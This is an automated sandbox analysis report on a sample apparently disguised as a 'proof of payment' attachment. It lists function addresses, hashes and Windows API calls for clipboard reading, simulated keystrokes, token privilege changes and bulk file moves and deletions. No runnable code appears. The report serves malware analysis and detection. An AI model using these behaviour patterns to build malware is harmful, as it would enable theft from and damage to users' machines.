Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: e39f6278bc3ba3e55857b0091fa8cd0922e9e554ec2e30f15ac92623fe086e93
Instruction ID: 2c12299f141055359f5d2acdf085f5c4a3fa3079158ae9502bc2d68a2f58fecc
Opcode Fuzzy Hash: e39f6278bc3ba3e55857b0091fa8cd0922e9e554ec2e30f15ac92623fe086e93
Instruction Fuzzy Hash: 3D119431600315AADB14AB75DE06FEE77E99F40700F108429F596E6182DA79EA00BF61

Function 01029B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 01029B51

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 5e7f5c7175f49c75be26597f4ccb4b3e2f4c7b35367d819193498def769d2dd7
Instruction ID: e08ae66dc9b97248a74725f80b72a1f59351d2e975b17b54b7f8380301cac65f
Opcode Fuzzy Hash: 5e7f5c7175f49c75be26597f4ccb4b3e2f4c7b35367d819193498def769d2dd7
Instruction Fuzzy Hash: 32214874508202CFDB24DF64C945F1ABBF1BF84304F14496CE69647261CB35E846EF52

Function 00FDAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00FDAFC0

Part of subcall function 00FD7BDA: __getptd_noexit.LIBCMT ref: 00FD7BDA

Part of subcall function 00FD7C0E: __getptd_noexit.LIBCMT ref: 00FD7C0E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: 4fc942d6024b7920359c0a11f82e9ea6649e7fa1c6ad513c8277342131c4ef4e
Instruction ID: 82d8b2ec174a6d6b84811428a7fac947ae23f0ac556c0a99e923b2227df5ea92
Opcode Fuzzy Hash: 4fc942d6024b7920359c0a11f82e9ea6649e7fa1c6ad513c8277342131c4ef4e
Instruction Fuzzy Hash: 2C118B728086009FD7127FA48C0675A3A62AF82331F1E4246E4705F3E6DBBD8900BBA1

Function 00FB39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction ID: 6b3791be56e2d8863c0ed979b03a27c6a4ac23ad9df395be0c5c7e449fb27be5
Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction Fuzzy Hash: 2D01863140010EAECF45EFA5CD81CFEBF78AF10344F108066B561971A6EA34A649EF60

Function 00FD2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00FD2AED

Part of subcall function 00FD7C0E: __getptd_noexit.LIBCMT ref: 00FD7C0E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: c7731cf60bf658f35b4c97b83fc7fcbaca67abe027f26f13b3aaf50fbe522dce
Instruction ID: aadac26d71d0be4a8de9acb4276b4392a7fcca542035263954baf45a7ada4bb0
Opcode Fuzzy Hash: c7731cf60bf658f35b4c97b83fc7fcbaca67abe027f26f13b3aaf50fbe522dce
Instruction Fuzzy Hash: 1AF01232A00205ABDF61BF658C0679F36A7BF50320F1D4517F4149A391D77D8A52FB91

Function 00FB4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,00FB39FE,?,00000001), ref: 00FB4286

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: cfebaf1325745b785452bcc416e4ec7c137b3e599d92b918c6dcb9d3bde8b63a
Instruction ID: cb8fb0b18d7a407f2f8d670c93c901e370c8be46ce5451fc317a92970043462f
Opcode Fuzzy Hash: cfebaf1325745b785452bcc416e4ec7c137b3e599d92b918c6dcb9d3bde8b63a
Instruction Fuzzy Hash: E2F03971905702DFCB349F66E990996BBE5BF053253248A3EF1D682612C772A840FF50

Function 00FB40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FB40C6

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 6516cb86bd388047c7c23231daed344538b231c058feabfe032c7bd579074d6c
Instruction ID: 9ddcdcbbdb10ad8d52bc7c7cd395ce5df3af840354359486b93b0e174d473800
Opcode Fuzzy Hash: 6516cb86bd388047c7c23231daed344538b231c058feabfe032c7bd579074d6c
Instruction Fuzzy Hash: 0FE0CD365001245BC711A654CC46FEA779DDF88690F090175F905D7244D96C99819790

Function 00FFBCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00FFBD16

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction ID: 6cd41fa8d4c5112e9340654ad86aaa79ff638dbee01715480a4fd1e6941d4f5b
Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction Fuzzy Hash: 0DE092B1504B049BD7388A24D800BF373E1EF05315F04081DF29A83341EBA27841D65A

Function 00A1BB94 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00A1BBA9

Memory Dump Source

Source File: 00000001.00000002.1297510516.0000000000A19000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a19000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 81a4f690775011bc0d8409a251ef3d27f7c3410e6c84c3ce039b8af7eedb483c
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: CAE0BF7494410DEFDB00DFA4D5496DD7BB4EF04301F1005A1FD05D7680DB309E548A62

Function 00A1BB98 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00A1BBA9

Memory Dump Source

Source File: 00000001.00000002.1297510516.0000000000A19000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a19000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 2d4e789a2f21a4acdd89ee79ec5e9ef59ffaf44d2a466b375069179e30a5badc
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: D5E0E67494410DEFDB00DFB4D5496DD7BB4EF04301F100161FD01D2280D7309E508A72

Non-executed Functions

Function 0101AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0101B1CD

Strings

%d/%02d/%02d, xrefs: 0101AEFC

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: b8f9b7b54f341b88787e1ef98b438cfb5ffe8bfb5974353a2ba6a95dfbe6f326
Instruction ID: 23fcddce3d987a2c9bd63b5917f8f817d82a007ef3ecd482cb44fb738b7c28d7
Opcode Fuzzy Hash: b8f9b7b54f341b88787e1ef98b438cfb5ffe8bfb5974353a2ba6a95dfbe6f326
Instruction Fuzzy Hash: 1E12E371600248ABEB259FA8CC49FAE7BF8FF45710F004159FA99DB2D9DB798541CB10

Function 00FCEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 00FCEB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01023AEA
IsIconic.USER32(000000FF), ref: 01023AF3
ShowWindow.USER32(000000FF,00000009), ref: 01023B00
SetForegroundWindow.USER32(000000FF), ref: 01023B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 01023B20
GetCurrentThreadId.KERNEL32 ref: 01023B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 01023B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 01023B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 01023B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 01023B54
SetForegroundWindow.USER32(000000FF), ref: 01023B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 01023B6C
keybd_event.USER32(00000012,00000000), ref: 01023B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 01023B81
keybd_event.USER32(00000012,00000000), ref: 01023B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 01023B8F
keybd_event.USER32(00000012,00000000), ref: 01023B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 01023B9E
keybd_event.USER32(00000012,00000000), ref: 01023BA3
SetForegroundWindow.USER32(000000FF), ref: 01023BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 01023BCD

Strings

Shell_TrayWnd, xrefs: 01023AE5

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 4c95e7f667a13f8b3065bf8a417913252b74e477ad06b1ad918bcdacd898ef35
Instruction ID: 4ef0f660e60589f972faec8901e2d68373c4856ef9ecfb408c112d8bfad7d83f
Opcode Fuzzy Hash: 4c95e7f667a13f8b3065bf8a417913252b74e477ad06b1ad918bcdacd898ef35
Instruction Fuzzy Hash: D931A371A403287BEB311FB58C4AF7F7E6CEB48B50F504055FA45EA1C1D6BA5800ABA0

Function 00FEACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 00FEB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FEB180
Part of subcall function 00FEB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FEB1AD
Part of subcall function 00FEB134: GetLastError.KERNEL32 ref: 00FEB1BA

_memset.LIBCMT ref: 00FEAD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FEAD5A
CloseHandle.KERNEL32(?), ref: 00FEAD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FEAD82
GetProcessWindowStation.USER32 ref: 00FEAD9B
SetProcessWindowStation.USER32(00000000), ref: 00FEADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FEADBF

Part of subcall function 00FEAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FEACC0), ref: 00FEAB99
Part of subcall function 00FEAB84: CloseHandle.KERNEL32(?,?,00FEACC0), ref: 00FEABAB

Strings

, xrefs: 00FEAD17
winsta0, xrefs: 00FEAD7D
default, xrefs: 00FEADBA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: a12c521915208e249da211a87d1edcb57c082c16edda583b03a00b13bd9b6f05
Instruction ID: ee6947e8b478060ef5f78790a27c8a9b949a917675cb908042b098e062d7ec36
Opcode Fuzzy Hash: a12c521915208e249da211a87d1edcb57c082c16edda583b03a00b13bd9b6f05
Instruction Fuzzy Hash: 3C819D71C00289AFDF21DFA6CC49AEEBBB9FF08314F044129F914A6151DB399E54EB61

Function 00FF60DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FF5FA6,?), ref: 00FF6ED8

Part of subcall function 00FF6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FF5FA6,?), ref: 00FF6EF1

Part of subcall function 00FF725E: __wsplitpath.LIBCMT ref: 00FF727B
Part of subcall function 00FF725E: __wsplitpath.LIBCMT ref: 00FF728E

Part of subcall function 00FF72CB: GetFileAttributesW.KERNEL32(?,00FF6019), ref: 00FF72CC

_wcscat.LIBCMT ref: 00FF6149
_wcscat.LIBCMT ref: 00FF6167
__wsplitpath.LIBCMT ref: 00FF618E
FindFirstFileW.KERNEL32(?,?), ref: 00FF61A4
_wcscpy.LIBCMT ref: 00FF6209
_wcscat.LIBCMT ref: 00FF621C
_wcscat.LIBCMT ref: 00FF622F
lstrcmpiW.KERNEL32(?,?), ref: 00FF625D
DeleteFileW.KERNEL32(?), ref: 00FF626E
MoveFileW.KERNEL32(?,?), ref: 00FF6289
MoveFileW.KERNEL32(?,?), ref: 00FF6298
CopyFileW.KERNEL32(?,?,00000000), ref: 00FF62AD
DeleteFileW.KERNEL32(?), ref: 00FF62BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FF62E1
FindClose.KERNEL32(00000000), ref: 00FF62FD
FindClose.KERNEL32(00000000), ref: 00FF630B

Strings

\*.*, xrefs: 00FF6138, 00FF6147, 00FF6165

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: 3ddeb75b05292d8cb55ca8659fde0a46b17a408509ea73fd23009f389212cf64
Instruction ID: 1b0652d41c779ecf720b8640a16f63ba04237044355168031be0eb3e2b5a3785
Opcode Fuzzy Hash: 3ddeb75b05292d8cb55ca8659fde0a46b17a408509ea73fd23009f389212cf64
Instruction Fuzzy Hash: D4512E72C0811C6ACB21EBA1CC44EEFB7BCAF05310F4901E6E685E2151EE3697499FA4

Function 01006B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0104DC00), ref: 01006B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 01006B44
GetClipboardData.USER32(0000000D), ref: 01006B4C
CloseClipboard.USER32 ref: 01006B58
GlobalLock.KERNEL32(00000000), ref: 01006B74
CloseClipboard.USER32 ref: 01006B7E
GlobalUnlock.KERNEL32(00000000), ref: 01006B93
IsClipboardFormatAvailable.USER32(00000001), ref: 01006BA0
GetClipboardData.USER32(00000001), ref: 01006BA8
GlobalLock.KERNEL32(00000000), ref: 01006BB5
GlobalUnlock.KERNEL32(00000000), ref: 01006BE9
CloseClipboard.USER32 ref: 01006CF6

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: a9cc46c21fecf83a4c0bd747258efc1e9f38df28079c015f79f9eaaea307e7f2
Instruction ID: 8932ef68f3c1570bc14adcd7ed8436e763ca1dc97b94ea1241e80748c18c7b9b
Opcode Fuzzy Hash: a9cc46c21fecf83a4c0bd747258efc1e9f38df28079c015f79f9eaaea307e7f2
Instruction Fuzzy Hash: 4E51D271200205ABE311EFA5CD86FBE77A9AF98B10F404029F6D6D71C0DF7AD8059B62

Function 00FFF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FFF62B
FindClose.KERNEL32(00000000), ref: 00FFF67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FFF6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FFF6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 00FFF6E2
__swprintf.LIBCMT ref: 00FFF72E
__swprintf.LIBCMT ref: 00FFF767
__swprintf.LIBCMT ref: 00FFF7BB

Part of subcall function 00FD172B: __woutput_l.LIBCMT ref: 00FD1784

__swprintf.LIBCMT ref: 00FFF809
__swprintf.LIBCMT ref: 00FFF858
__swprintf.LIBCMT ref: 00FFF8A7
__swprintf.LIBCMT ref: 00FFF8F6

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00FFF728
%02d, xrefs: 00FFF7B0, 00FFF7B9, 00FFF807, 00FFF856, 00FFF8A5, 00FFF8F4
%4d, xrefs: 00FFF761

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 1bd8d8d951dba96efc7e9513df979d61058a25e9d9925c39173d645c28cee430
Instruction ID: 19030519dc6b4721323fb41ecb961ec085bca3f8aff5226a7696103055fc3563
Opcode Fuzzy Hash: 1bd8d8d951dba96efc7e9513df979d61058a25e9d9925c39173d645c28cee430
Instruction Fuzzy Hash: 69A11FB2408344ABC354EBA5CD86EAFB7ECBF98700F44081EF595C6151EB38D949DB62

Function 01001B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 01001B50
_wcscmp.LIBCMT ref: 01001B65
_wcscmp.LIBCMT ref: 01001B7C
GetFileAttributesW.KERNEL32(?), ref: 01001B8E
SetFileAttributesW.KERNEL32(?,?), ref: 01001BA8
FindNextFileW.KERNEL32(00000000,?), ref: 01001BC0
FindClose.KERNEL32(00000000), ref: 01001BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 01001BE7
_wcscmp.LIBCMT ref: 01001C0E
_wcscmp.LIBCMT ref: 01001C25
SetCurrentDirectoryW.KERNEL32(?), ref: 01001C37
SetCurrentDirectoryW.KERNEL32(010639FC), ref: 01001C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 01001C5F
FindClose.KERNEL32(00000000), ref: 01001C6C
FindClose.KERNEL32(00000000), ref: 01001C7C

Strings

*.*, xrefs: 01001BE2

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 6255b700f804bc3f9cdf5b4f5f5e8849b69937ac10030d213903e86b18a029aa
Instruction ID: 7133cdf0815e067eac7e3991cd79e151db687e46e1baf6f835480a087d2e2fe6
